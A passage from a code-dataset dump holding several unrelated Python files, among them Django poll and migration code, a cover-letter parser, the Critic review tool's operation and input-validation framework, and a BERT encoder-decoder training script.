RenderItemsClass(template.Node):\r\n def __init__(self, poll, items):\r\n self.poll = template.Variable(poll)\r\n self.items = template.Variable(items)\r\n\r\n def render(self, context):\r\n poll = self.poll.resolve(context)\r\n items = self.items.resolve(context)\r\n #'name' = item.pk\r\n pattern1 = u'{3}

    '\r\n pattern2 = u' {3}
    '\r\n result = u''\r\n\r\n #Choose an input type\r\n for item in items:\r\n if item.userbox:\r\n input_type = 'textbox'\r\n pattern = pattern1\r\n else:\r\n poll_type = poll.print_polltype()\r\n\r\n if poll_type == 'Single':\r\n input_type = 'radio'\r\n elif poll_type == 'Multiple':\r\n input_type = 'checkbox'\r\n pattern = pattern2\r\n\r\n result += pattern.format(poll.pk, input_type, item.pk, item.value)\r\n\r\n return result\r\n\r\n\r\n@register.tag\r\ndef render_items(parser, token):\r\n tag, poll, items = token.split_contents()\r\n return RenderItemsClass(poll, items)\r\n","sub_path":"poll/templatetags/polls_tags.py","file_name":"polls_tags.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"466574353","text":"\ndef parseParagraphs(postingData, info):\n\tnumParagraphs = 0\n\tparagraphs = [\"\",\"\",\"\",\"\"]\n\t\n\t# Read the paragraph.txt file into a list\n\tparagraphsData = [line.strip('\\n') for line in open(\"config/paragraphs.txt\")]\n\t\n\t# Read the keywords.txt file, and place the keywords in a list\n\t# keywords = [line.strip('\\n').center(len(line) + 1) for line in open(\"config/keywords.txt\")]\n\t\n\t#postingList = []\n\t#ParagraphList = []\n\t\n\t# Find keywords in posting data, match those with keywords found in paragraphs\n\t#postingList = postingKeywords(postingData, keywords)\n\t\n\t#for line in paragraphs:\n\t#\tfor word in postingList:\n\t#\t\tif word in line:\n\t#\t\t\tprint(\"Yes\")\n\t\n\t#print(postingList)\n\t\n\t# Select paragraphs to use\n\tfor line in paragraphsData:\n\t\tif \"OPENING_PARAGRAPH=\" in line:\n\t\t\tuseless, paragraphs[0] = line.split(\"=\",1)\n\t\t\tparagraphs[0] = paragraphs[0].replace(\"=POSITION\", info[1])\n\t\t\tparagraphs[0] = paragraphs[0].replace(\"=COMPANY\", info[5])\n\t\tif \"CLOSING_PARAGRAPH=\" in line:\n\t\t\tuseless, paragraphs[3] = line.split(\"=\",1)\n\t\t\tparagraphs[3] = paragraphs[3].replace(\"=POSITION\", info[1])\n\t\t\tparagraphs[3] = paragraphs[3].replace(\"=COMPANY\", info[5])\n\t\tif \"PARAGRAPH_1=\" in line:\n\t\t\tuseless, paragraphs[1] = line.split(\"=\",1)\n\t\tif \"PARAGRAPH_2=\" in line:\n\t\t\tuseless, paragraphs[2] = line.split(\"=\",1)\n\t\tif \"PARAGRAPH_\" in line:\n\t\t\tnumParagraphs += 1\n\t\t\n\tprint(\"Number of paragaphs found:\", numParagraphs)\n\treturn paragraphs\n\t\ndef parseInfo(postingData):\n\tinfo = [\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"]\n\t# 00 Position Duration\n\t# 01 Job Title\n\t# 02 Job City\n\t# 03 Job Province / State\n\t# 04 Job Country\n\t# 05 Organization Name\n\t# 06 Department name\n\t# 07 Salutation\n\t# 08 Contact First Name\n\t# 09 Contact Last Name\n\t# 10 Contact Title\n\t# 11 Address Line 1\n\t# 12 Address Line 2\n\t# 13 City\n\t# 14 Province / State\n\t# 15 Postal / Zip Code\n\t# 16 Country\n\n\t# Look through posting data for each required variable\n\tfor line in postingData:\n\t\tif \"Position Duration:\" in line:\n\t\t\twaste, info[0] = line.split(\":\",1)\n\t\tif \"Job Title:\" in line:\n\t\t\twaste, info[1] = line.split(\":\",1)\n\t\tif \"Job City:\" in line:\n\t\t\twaste, info[2] = line.split(\":\",1)\n\t\tif \"Job Province / State:\" in line:\n\t\t\twaste, info[3] = line.split(\":\",1)\n\t\tif \"Job Country:\" in line:\n\t\t\twaste, info[4] = line.split(\":\",1)\n\t\tif \"Organization:\" in line:\n\t\t\twaste, info[5] = line.split(\":\",1)\n\t\tif \"Division / Department:\" in line:\n\t\t\twaste, info[6] = line.split(\":\",1)\n\t\tif \"Salutation:\" in line:\n\t\t\twaste, info[7] = line.split(\":\",1)\n\t\tif \"Job Contact First Name:\" in line:\n\t\t\twaste, info[8] = line.split(\":\",1)\n\t\tif \"Job Contact Last Name:\" in line:\n\t\t\twaste, info[9] = line.split(\":\",1)\n\t\tif \"Contact Title:\" in line:\n\t\t\twaste, info[10] = line.split(\":\",1)\n\t\tif \"Address Line One:\" in line:\n\t\t\twaste, info[11] = line.split(\":\",1)\n\t\tif \"Address Line Two:\" in line:\n\t\t\twaste, info[12] = line.split(\":\",1)\n\t\tif \"City:\" in line and not \"Job City:\" in line:\n\t\t\twaste, info[13] = line.split(\":\",1)\n\t\tif \"Province / State:\" in line and not \"Job Province / State:\" in line:\n\t\t\twaste, info[14] = line.split(\":\",1)\n\t\tif \"Postal Code / Zip Code:\" in line:\n\t\t\twaste, info[15] = line.split(\":\",1)\n\t\tif \"Country:\" in line and not \"Job Country:\" in line:\n\t\t\twaste, info[16] = line.split(\":\",1)\n\t\t# Format information\n\t\tinfo[:] = [line.strip() for line in info]\t\t\n\t\n\treturn info\n\t\ndef genFileNameCL(organization, position):\n\tfileName = \"placeholder\"\n\t\n\tif len(organization) + len(position) < 12:\n\t\tfileName = organization + \"_\" + position + \"coverletter\"\n\t\tfileName = \"\".join(fileName.split())\n\telse:\n\t\tfileName = genFileNameCLShort(organization, position)\n\t\n\tfileName = fileName.replace(\".\",\"\")\n\t\n\treturn fileName\n\ndef genFileNameCLShort(organization, position):\n\tfileName = \"placeholder\"\n\t\n\tif len(organization) > 12:\n\t\torganization = ''.join(char for char in organization if char.isupper())\n\t\tprint(\"Using short form for the file name.\")\n\tpositionInitials = ''.join(char for char in position if char.isupper())\n\tfileName = str(organization) + \"_\" + str(positionInitials) + \"_cover_letter\"\n\tfileName = \"\".join(fileName.split())\n\t\n\treturn fileName\n\ndef genFileNameRE(organization, position):\n\tfileName = \"placeholder\"\n\t\n\tif len(organization) + len(position) < 12:\n\t\tfileName = organization + \"_\" + position + \"coverletter\"\n\t\tfileName = \"\".join(fileName.split())\n\telse:\n\t\tfileName = genFileNameREShort(organization, position)\n\t\n\tfileName = fileName.replace(\".\",\"\")\n\t\n\treturn fileName\n\ndef genFileNameREShort(organization, position):\n\tfileName = \"placeholder\"\n\t\n\tif len(organization) > 12:\n\t\torganization = ''.join(char for char in organization if char.isupper())\n\t\tprint(\"Using short form for the file name.\")\n\t\n\tpositionInitials = ''.join(char for char in position if char.isupper())\n\tfileName = str(organization) + \"_\" + str(positionInitials) + \"_resume\"\n\tfileName = \"\".join(fileName.split())\n\t\n\treturn fileName\n\ndef parseUserInfo():\n\tuserInfo = [\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"]\n\t\n\tuserConfigData = [line.strip('\\n') for line in open(\"config/config.txt\")]\n\t\n\tfor line in userConfigData:\n\t\tif \"USER_FIRST_NAME=\" in line:\n\t\t\twaste, userInfo[0] = line.split(\"=\",1)\n\t\tif \"USER_LAST_NAME=\" in line:\n\t\t\twaste, userInfo[1] = line.split(\"=\",1)\n\t\tif \"USER_ADDRESS_ONE=\" in line:\n\t\t\twaste, userInfo[2] = line.split(\"=\",1)\n\t\tif \"USER_ADDRESS_TWO=\" in line:\n\t\t\twaste, userInfo[3] = line.split(\"=\",1)\n\t\tif \"USER_EMAIL=\" in line:\n\t\t\twaste, userInfo[4] = line.split(\"=\",1)\n\t\tif \"USER_CELL=\" in line:\n\t\t\twaste, userInfo[5] = line.split(\"=\",1)\n\t\tif \"USER_WEBSITE_ONE=\" in line:\n\t\t\twaste, userInfo[6] = line.split(\"=\",1)\n\t\tif \"USER_WEBSITE_TWO=\" in line:\n\t\t\twaste, userInfo[7] = line.split(\"=\",1)\n\t\t\t\n\treturn userInfo\n","sub_path":"CLR_v2/parse_txt.py","file_name":"parse_txt.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"397864145","text":"from direct.gui.OnscreenImage import OnscreenImage\nfrom direct.gui.OnscreenText import OnscreenText\nfrom panda3d.core import TextNode\nfrom panda3d.core import TransparencyAttrib\n\nfrom src.core.data import Font1\n\nclass ResourceDisplay:\n def __init__(self, root):\n self.root = root.attachNewNode(\"ResourceDisplay\")\n\n self.scienceImg = OnscreenImage(image=\"data/images/science.png\",\n pos=(0, 0, .1),\n scale=0.045,\n parent=self.root)\n self.scienceImg.setTransparency(TransparencyAttrib.MAlpha)\n self.scienceCost = OnscreenText(scale=0.06, pos=(0.06, 0.08), fg=(1, 1, 1, 1), align=TextNode.ALeft,\n parent=self.root, font=Font1)\n\n self.creditsImg = OnscreenImage(image=\"data/images/currency.png\",\n pos=(0, 0, 0),\n scale=0.045,\n parent=self.root)\n self.creditsImg.setTransparency(TransparencyAttrib.MAlpha)\n self.creditsCost = OnscreenText(scale=0.06, pos=(0.06, -.02), fg=(1, 1, 1, 1), align=TextNode.ALeft,\n parent=self.root, font=Font1)\n\n self.fuelImg = OnscreenImage(image=\"data/images/fuel.png\",\n pos=(0, 0, -.1),\n scale=0.045,\n parent=self.root)\n self.fuelImg.setTransparency(TransparencyAttrib.MAlpha)\n self.fuelCost = OnscreenText(scale=0.06, pos=(0.06, -.12), fg=(1, 1, 1, 1), align=TextNode.ALeft,\n parent=self.root, font=Font1)\n\n def update(self, resources):\n self.scienceCost.setText(str(resources[\"science\"]))\n self.creditsCost.setText(str(resources[\"credits\"]))\n self.fuelCost.setText(str(resources[\"fuel\"]))\n\n def setPos(self, x, y, z):\n self.root.setPos(x, y, z)","sub_path":"src/game/build/components/resource_display.py","file_name":"resource_display.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"283657943","text":"# 10진수를 16진수로\ndict={10:'a', 11:'b', 12:'c', 13:'d', 14:'e', 15:'f'}\ndecimal=int(input(\"변환할 십진수를 입력하세요: \"))\nresult = ''\nwhile (decimal > 0):\n remainder = decimal % 16\n if remainder>9:\n remainder=dict[remainder]\n decimal = decimal // 16\n result = str(remainder) + result\nprint(result)\n","sub_path":"04. Conditional & Repetitive Statement/decimalToHexadecimal.py","file_name":"decimalToHexadecimal.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"247877142","text":"from textHandler.nominalPhrasesIdentifier.NominalPhrasesIdentifier import NominalPhrasesIdentifier\nfrom textHandler.nominalPhrasesWithTreeTagger.NominalPhrasesIdentifierWithTreeTagger import \\\n NominalPhrasesIdentifierWithTreeTagger\nfrom textHandler.textTokenizer.TextTokenizer import WordSeparator\nfrom textHandler.wordFrequencyCalculator.WordFrequencynator import WordFrequencynator\nfrom jsonHandler.JsonHandler import JsonHandler\n\n\nclass TextHandler(object):\n configuration = {}\n stop_words = {}\n useTreeTagger = True\n\n def __init__(self, configuration: dict):\n self.configuration = configuration\n self.stop_words = {}\n\n def remove_stop_words(self, list_of_tokens: list) -> list:\n if len(self.stop_words) == 0:\n with open(self.configuration['stop_words']) as stopWordsFile:\n self.stop_words = stopWordsFile.read().splitlines()\n filtered_list = []\n for token in list_of_tokens:\n if token.lower() not in self.stop_words:\n filtered_list.append(token)\n return filtered_list\n\n def handle_text(self):\n word_separator = WordSeparator(frozenset(self.configuration['word_separators']),\n frozenset(self.configuration['punctuation_characters']))\n\n list_of_all_tokens = []\n list_of_all_tokens_without_stopwords = []\n keys = ['title', 'description', 'teaser']\n for entry in self.configuration['raw_data']:\n for key in keys:\n if key in entry:\n list_of_tokens = word_separator.separate_words(entry[key])\n list_of_all_tokens.append(list_of_tokens)\n list_of_tokens_without_stop_words = self.remove_stop_words(list_of_tokens)\n list_of_all_tokens_without_stopwords.append(list_of_tokens_without_stop_words)\n\n entries = JsonHandler.get_data_json_from_file(self.configuration['source_text'])\n frequencynator = WordFrequencynator(self.configuration, self.stop_words, keys)\n frequencynator.load_lemmatization_data()\n processedData = []\n\n if self.useTreeTagger:\n nominal_phrases_identifier = NominalPhrasesIdentifierWithTreeTagger(self.configuration['raw_data'])\n else:\n nominal_phrases_identifier = NominalPhrasesIdentifier(list_of_all_tokens)\n\n for key, values in enumerate(entries):\n # packe Ortsangaben in nen schickes location Objektchen\n values['location'] = {\"street\": values['street'], \"district\": values['district']}\n del values['district']\n del values['street']\n\n # ergaenze worthaeufigkeit\n values['words'] = frequencynator.get_word_frequency_from_entry(values)\n\n # ergaenze NPs\n if self.useTreeTagger:\n values['phrases'] = nominal_phrases_identifier.get_phrases_count_from_data(values)\n else:\n values['phrases'] = nominal_phrases_identifier.get_phrases_count_from_data(values, 3)\n\n # print(values['phrases'])\n processedData.append(values)\n\n # tue es weg ins Nirvana\n JsonHandler.create_json_file(self.configuration['path_to_output'] + 'fire.json', processedData)\n","sub_path":"dataEnrichment/textHandler/TextHandler.py","file_name":"TextHandler.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"4543861","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport numpy as np\nfrom django.db import models, migrations\nfrom movie_stats.models import Rater, Movie, Review, Avgmovrate\n\ndef getavgrate(x, y):\n # all_rates = Review.objects.all()\n #movrate = [(item.movieId.movieId,Review.objects.filter(movieId = item.movieId)) for item in all_rates]\n \"\"\"for item in all_rates:\n item.movieId.movieId\n mov_list = []\n for movie in Review.objects.filter(movieId = item.movieId):\n mov_list.append(movie.rating)\n avg_mov = np.mean(mov_list)\n avg_save = Avgmovrate.objects.create(movieId=Movie.objects.get(movieId=item.movieId.movieId), avg_mov=avg_mov)\n print(avg_save)\n avg_save.save()\"\"\"\n all_movies = Movie.objects.all()\n for item in all_movies:\n movrate = []\n print(\"Movie\", item)\n for review in Review.objects.filter(movieId = item):\n movrate.append(review.rating)\n #print(item)\n avg_rate = np.mean(movrate)\n if not movrate:\n avg_rate = 0\n print(avg_rate)\n avg_save = Avgmovrate.objects.create(movieId=Movie.objects.get(movieId = item.movieId), avg_mov=avg_rate)\n avg_save.save()\n\n\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('movie_stats', '0017_avgmovrate'),\n ]\n\n operations = [\n migrations.RunPython(getavgrate),\n ]\n","sub_path":"movieratings/movie_stats/migrations/0018_auto_20150701_1828.py","file_name":"0018_auto_20150701_1828.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"98404975","text":"# -*- mode: python; encoding: utf-8 -*-\n#\n# Copyright 2012 Jens Lindström, Opera Software ASA\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not\n# use this file except in compliance with the License. You may obtain a copy of\n# the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations under\n# the License.\n\nimport sys\nimport traceback\n\nimport base\nimport mailutils\nimport dbutils\nimport htmlutils\nimport configuration\n\nfrom textutils import json_encode, json_decode\n\nclass OperationResult:\n \"\"\"\\\n Simple container for successful operation result.\n\n The constructor builds a dictionary from all keyword arguments,\n and adds {\"status\": \"ok\"} unless a different \"status\" is specified\n as a keyword argument.\n\n Converting an OperationResult object to string converts this\n dictionary to a JSON object literal.\n \"\"\"\n\n def __init__(self, **kwargs):\n self.__value = kwargs\n if \"status\" not in self.__value:\n self.__value[\"status\"] = \"ok\"\n self.__cookies = {}\n def __str__(self):\n return json_encode(self.__value)\n def set(self, key, value):\n self.__value[key] = value\n def setCookie(self, name, value=None, secure=False):\n self.__cookies[name] = (value, secure)\n return self\n def addResponseHeaders(self, req):\n for name, (value, secure) in self.__cookies.items():\n if value:\n if secure and configuration.base.ACCESS_SCHEME != \"http\":\n modifier = \"Secure\"\n else:\n modifier = \"HttpOnly\"\n cookie = \"%s=%s; Max-Age=31536000; %s\" % (name, value, modifier)\n else:\n cookie = \"%s=invalid; Expires=Thursday 01-Jan-1970 00:00:00 GMT\" % name\n req.addResponseHeader(\"Set-Cookie\", cookie)\n\nclass OperationError(Exception):\n \"\"\"\\\n Exception class for unexpected operation errors.\n\n Converting an OperationError object to string produces a JSON\n object literal with the properties status=\"error\" and\n error=.\n \"\"\"\n\n def __init__(self, message):\n self.__message = message\n def __str__(self):\n return json_encode({ \"status\": \"error\", \"error\": self.__message })\n\nclass OperationFailure(Exception):\n \"\"\"\\\n Exception class for operation failures caused by invalid input.\n\n Converting an OperationError object to string produces a JSON\n object literal with the properties status=\"failure\", title=\n and message=<message>.\n \"\"\"\n\n def __init__(self, code, title, message, is_html=False):\n self.__code = code\n self.__title = htmlutils.htmlify(title)\n self.__message = message if is_html else htmlutils.htmlify(message)\n def __str__(self):\n return json_encode({ \"status\": \"failure\",\n \"code\": self.__code,\n \"title\": self.__title,\n \"message\": self.__message })\n\nclass OperationFailureMustLogin(OperationFailure):\n def __init__(self):\n super(OperationFailureMustLogin, self).__init__(\n \"mustlogin\",\n \"Login Required\",\n \"You have to sign in to perform this operation.\")\n\nclass TypeChecker:\n \"\"\"\\\n Interface for checking operation input type correctness.\n\n Sub-classes implement the method __call__(value, context) which raises an\n OperationError if the input is incorrect.\n\n A type checker structure is created using the static make() function.\n\n \"\"\"\n @staticmethod\n def make(source):\n \"\"\"\\\n Construct a structure of TypeChecker objects.\n\n The source argument should be a dict object, single-element list object,\n a set object containing strings, or str, int or bool (the actual type\n objects, not a string, integer or boolean value).\n\n If the source argument is a dict object, per-element type checkers are\n constructed by calling this function on the value of each item in the\n dictionary. See DictionaryChecker for details.\n\n If the source argument is a list object, a per-element type checker is\n constructed by calling this function on the value of the single element\n in the list.\n\n If the source argument is a set object, all elements in it should be\n strings, and the constructed checker verifies that the value is a string\n that is a member of the set.\n\n Otherwise the constructed checker verifies that the value is of the type\n of the source argument (or, in the case of source=str, that the value's\n type is either str or unicode).\n\n \"\"\"\n if type(source) is dict: return DictionaryChecker(source)\n elif type(source) is list: return ArrayChecker(source)\n elif type(source) is set:\n if len(filter(lambda x: type(x) is str, source)) == len(source):\n return EnumerationChecker(source)\n return VariantChecker(source)\n elif source is str: return StringChecker()\n elif source is int: return IntegerChecker()\n elif source is bool: return BooleanChecker()\n else: raise base.ImplementationError(\"invalid source type\")\n\nclass Optional:\n \"\"\"\\\n Utility class for signaling that a dictionary member is optional.\n\n \"\"\"\n def __init__(self, source):\n self.source = source\n\nclass DictionaryChecker:\n \"\"\"\\\n Type checker for dictionary objects.\n\n Checks two sets of members: required and optional. Raises an OperationError\n if the checked value is not a dictionary or if any required member is not\n present in it, or if it contains any unexpected members. Applies\n per-element checkers on all required members and on all present optional\n members.\n\n \"\"\"\n def __init__(self, source):\n self.__required = []\n self.__optional = []\n self.__expected = set()\n\n for name, source_type in source.items():\n if isinstance(source_type, Optional):\n self.__optional.append((name, TypeChecker.make(source_type.source)))\n else:\n self.__required.append((name, TypeChecker.make(source_type)))\n self.__expected.add(name)\n\n def __call__(self, value, context=None):\n if not type(value) is dict:\n raise OperationError(\"invalid input: %s is not a dictionary\" % (context if context else \"value\"))\n for name, checker in self.__required:\n child_context = \"%s.%s\" % (context, name) if context else name\n if name not in value:\n raise OperationError(\"invalid input: %s missing\" % child_context)\n else:\n checker(value[name], child_context)\n for name, checker in self.__optional:\n if name in value:\n child_context = \"%s.%s\" % (context, name) if context else name\n checker(value[name], child_context)\n for name in value:\n if name not in self.__expected:\n child_context = \"%s.%s\" % (context, name) if context else name\n raise OperationError(\"invalid input: %s is unexpected\" % child_context)\n\nclass ArrayChecker:\n \"\"\"\\\n Type checker for arrays.\n\n Raises an OperationError if the checked value is not an array. Applies the\n per-element checker on each element in the array.\n\n \"\"\"\n def __init__(self, source):\n if len(source) != 1:\n raise base.ImplementationError(\"invalid source type\")\n self.__checker = TypeChecker.make(source[0])\n\n def __call__(self, value, context):\n if not type(value) is list:\n raise OperationError(\"%s is not a list\" % context)\n for index, item in enumerate(value):\n self.__checker(item, \"%s[%d]\" % (context, index))\n\nclass VariantChecker:\n \"\"\"\\\n Type checker for variants (values of one of a set of types.)\n\n Raises an OperationError if the checked value is not one of the permitted\n types (checked by applying a per-type checker on the value.)\n\n \"\"\"\n def __init__(self, source):\n self.__checkers = [TypeChecker.make(item) for item in source]\n\n def __call__(self, value, context):\n for checker in self.__checkers:\n try:\n checker(value, context)\n return\n except OperationError:\n pass\n raise OperationError(\"%s is of invalid type\" % context)\n\nclass EnumerationChecker:\n \"\"\"\\\n Type checker for enumerations.\n\n Raises an OperationError if the checked value is not a string or if the\n string value is not a member of the enumeration.\n\n \"\"\"\n def __init__(self, source):\n self.__checker = TypeChecker.make(str)\n for item in source:\n if not type(item) is str:\n raise base.ImplementationError(\"invalid source type\")\n self.__enumeration = source\n\n def __call__(self, value, context):\n self.__checker(value, context)\n if value not in self.__enumeration:\n raise OperationError(\"invalid input: %s is not valid\" % context)\n\nclass StringChecker:\n \"\"\"\\\n Type checker for strings.\n\n Raises an OperationError if the checked value is not a string.\n\n \"\"\"\n def __call__(self, value, context):\n if not (type(value) is str or type(value) is unicode):\n raise OperationError(\"invalid input: %s is not a string\" % context)\n\nclass IntegerChecker:\n \"\"\"\\\n Type checker for integers.\n\n Raises an OperationError if the checked value is not an integer.\n\n \"\"\"\n def __call__(self, value, context):\n if not type(value) is int:\n raise OperationError(\"invalid input: %s is not an integer\" % context)\n\nclass BooleanChecker:\n \"\"\"\\\n Type checker for booleans.\n\n Raises an OperationError if the checked value is not a boolean.\n\n \"\"\"\n def __call__(self, value, context):\n if not type(value) is bool:\n raise OperationError(\"invalid input: %s is not a boolean\" % context)\n\nclass Operation(object):\n \"\"\"\\\n Base class for operation implementations.\n\n Sub-classes must call Operation.__init__() to define the structure of\n expected input data.\n\n An operation accepts input in the form of a JSON object literal and returns\n a result in the form of a JSON object literal. The object contains a\n property named \"status\" whose value should be \"ok\" or \"error\". If it is\n \"error\", the object contains a property named \"error\" whose value is an\n error message. If the HTTP request method is POST, the input is the request\n body (this is the usual case) otherwise, if the HTTP request method is GET,\n the input is the value of the \"data\" URI query parameter (this is supported\n to simplify ad-hoc testing).\n\n Operation implementations should inherit this class and implement the\n process() method. This method is called with two positional arguments, 'db'\n and 'user', and one keyword argument per property in the input value. The\n process() method should return an OperationResult object or either return or\n raise an OperationError object. Any other raised exceptions are caught and\n converted to OperationError objects.\n\n \"\"\"\n def __init__(self, parameter_types, accept_anonymous_user=False):\n \"\"\"\\\n Initialize input data type checker.\n\n The parameter_types argument must be a dict object. See TypeChecker and\n sub-classes for details on how it works. A parameter types argument of\n\n { \"name\": str,\n \"points\": [{\"x\": int, \"y\": int }],\n \"what\": Optional(str) }\n\n would for instance represents an input object with two required\n properties named \"name\" and \"points\", and an optional property named\n \"what\". The \"name\" and \"what\" property values should be a strings. The\n \"points\" property value should be an array of objects, each with two\n properties named \"x\" and \"y\", whose values should be integer.\n\n The operation's process() method would be called with the keyword\n arguments \"name\", \"points\" and \"what\".\n\n \"\"\"\n if not type(parameter_types) is dict:\n raise base.ImplementationError(\"invalid source type\")\n self.__checker = TypeChecker.make(parameter_types)\n self.__accept_anonymous_user = accept_anonymous_user\n\n def __call__(self, req, db, user):\n if user.isAnonymous() and not self.__accept_anonymous_user:\n return OperationFailureMustLogin()\n\n if req.method == \"POST\": data = req.read()\n else: data = req.getParameter(\"data\")\n\n if not data: raise OperationError(\"no input\")\n\n try: value = json_decode(data)\n except ValueError as error: raise OperationError(\"invalid input: %s\" % str(error))\n\n try:\n self.__checker(value)\n return self.process(db, user, **value)\n except OperationError as error:\n return error\n except OperationFailure as failure:\n return failure\n except dbutils.NoSuchUser as error:\n return OperationFailure(code=\"nosuchuser\",\n title=\"Who is '%s'?\" % error.name,\n message=\"There is no user in Critic's database named that.\")\n except dbutils.NoSuchReview as error:\n return OperationFailure(code=\"nosuchreview\",\n title=\"Invalid review ID\",\n message=\"The review ID r/%d is not valid.\" % error.id)\n except dbutils.TransactionRollbackError:\n return OperationFailure(code=\"transactionrollback\",\n title=\"Transaction rolled back\",\n message=\"Your database transaction rolled back, probably due to a deadlock. Please try again.\")\n except:\n error_message = (\"User: %s\\nReferrer: %s\\nData: %s\\n\\n%s\"\n % (user.name,\n req.getReferrer(),\n json_encode(self.sanitize(value), indent=2),\n traceback.format_exc()))\n\n db.rollback()\n\n if not user.hasRole(db, \"developer\"):\n mailutils.sendExceptionMessage(db, \"wsgi[%s]\" % req.path, error_message)\n\n if configuration.debug.IS_DEVELOPMENT or user.hasRole(db, \"developer\"):\n return OperationError(error_message)\n else:\n return OperationError(\"An unexpected error occurred. \" +\n \"A message has been sent to the system administrator(s) \" +\n \"with details about the problem.\")\n\n def process(self, db, user, **kwargs):\n raise OperationError(\"not implemented!?!\")\n\n def sanitize(self, value):\n \"\"\"Sanitize arguments value for use in error messages or logs.\"\"\"\n return value\n\n @staticmethod\n def requireRole(db, role, user):\n if not user.hasRole(db, role):\n raise OperationFailure(\n code=\"notallowed\",\n title=\"Not allowed!\",\n message=\"Operation not permitted.\")\n","sub_path":"src/operation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"513376531","text":"a= abs\nprint(a(-10))\nn1 = 255\nn2 = 100\nprint(\"{}+ {}\".format(hex(n1),hex(n2)))\n\n# 可变参数\ndef calc(*numbers):\n sum = 0\n for n in numbers:\n sum += n*n\n return sum\n\nnums = [1,2,3]\nprint(calc(*nums))\n\n# 关键字参数,可无限个输入参数\ndef calc1(**kw):\n return (kw)\ntemp = {\"hello\":\"kaspar\",\"bye\":2018}\nprint(calc1(**temp))\n\n# 命名关键字参数, 只接受 city和job作为关键字参数\ndef person(name, age, *, city, job):\n print(name ,age, city, job)\n\n# 递归函数\ndef fact(n):\n if n == 1:\n return 1\n return n * fact(n-1)\n\nprint(fact(5))","sub_path":"2function.py","file_name":"2function.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"266420371","text":"import pandas as pd\nimport numpy as np\nimport torch\nimport matplotlib\nimport faulthandler\nfaulthandler.enable()\nimport pickle\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport json\nfrom transformers import GPT2Tokenizer, GPT2LMHeadModel, EncoderDecoderModel, BertTokenizer\nfrom pathlib import Path\nimport torch.nn as nn\nimport bot_models as models\nimport bot_utils as butils\nfrom bot_utils import Comment_data_preprocessor, Comment_dataset, Comment_pair_dataset\n\n\ntest = False\nnew_dataset = True\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\nget_type = 'sample1_first'\n\nprint(\"Loading data\")\nif new_dataset:\n raw_data_path = '../data/pairs_v3.pkl'\n sample1_field = 'fb_post'\n sample2_field = 'tweet'\n json_ = False\n if json_:\n with open(raw_data_path, 'rb') as file:\n raw_data = json.load(file)\n else:\n with open(raw_data_path, 'rb') as file:\n raw_data = pickle.load(file)\n\n if test:\n raw_data = raw_data[0:5]\n\n dataset = Comment_pair_dataset(raw_data, sample1_field, sample2_field, tokenizer)\n dataset.set_get_type(get_type)\n dataset.max_len = 512 #tokenizer.max_len\n\nelse:\n data_path = '' #needs to be readable by pandas\n data_sample_column = 'token_ids'\n tokenized_df = pd.read_csv(data_path)\n dataset = Comment_pair_dataset(tokenized_df, sample1_field, sample2_field, tokenizer, already_tokenized = True)\n dataset.max_len = tokenizer.max_len\n\nresults_dir = '../results'\nmodel_storage_dir = '../saved_models'\n\n\nparameter_dict = {}\nparameter_dict['epochs'] =10\nparameter_dict['num_worker'] = 2\nparameter_dict['batch_size'] = 2\nparameter_dict['learning_rate'] =1e-8\nparameter_dict['weight_decay'] = 0\nparameter_dict['eps'] =1e-8\nparameter_dict['warmup_steps'] =0\nparameter_dict['filename'] = 'pair_v3_encode_decode_100620'\n\nresults_path = Path(Path(results_dir)/Path(parameter_dict['filename']))\nmodel_path = Path(Path(model_storage_dir)/Path(parameter_dict['filename']))\nresults_path.mkdir(parents = True, exist_ok = True)\nmodel_path.mkdir(parents = True, exist_ok = True)\n\nprint(\"Loading Model\")\n\nmodel = EncoderDecoderModel.from_encoder_decoder_pretrained('bert-base-uncased', 'bert-base-uncased')\n\nprint(\"Starting Training\")\ntrained_model, optimizer, scheduler, loss_data = butils.train_hugging_encode_decode_keyword(dataset, parameter_dict['epochs'],\n parameter_dict['num_worker'],\n parameter_dict['batch_size'],\n parameter_dict['learning_rate'],\n parameter_dict['weight_decay'],\n parameter_dict['eps'],\n parameter_dict['warmup_steps'],\n model,\n dataset.collate\n )\nprint(\"Saving results\")\n\ndataset.active_data.to_csv(results_path/'training_data.csv')\n\ntrained_model.save_pretrained(model_storage_dir + '/' + parameter_dict['filename'])\ntokenizer.save_pretrained(model_storage_dir+'/'+parameter_dict['filename'])\ntrained_model.config.save_pretrained(model_storage_dir+'/'+parameter_dict['filename'])\n\n#saving torch stuff - see torch docs for proper loading\ntorch.save(optimizer.state_dict(), Path(model_path)/Path(parameter_dict['filename']+' optimizer'))\ntorch.save(scheduler.state_dict(), Path(model_path)/Path(parameter_dict['filename']+' scheduler'))\n\n#saving parameter dict\nwith open(results_path/'parameters.json', 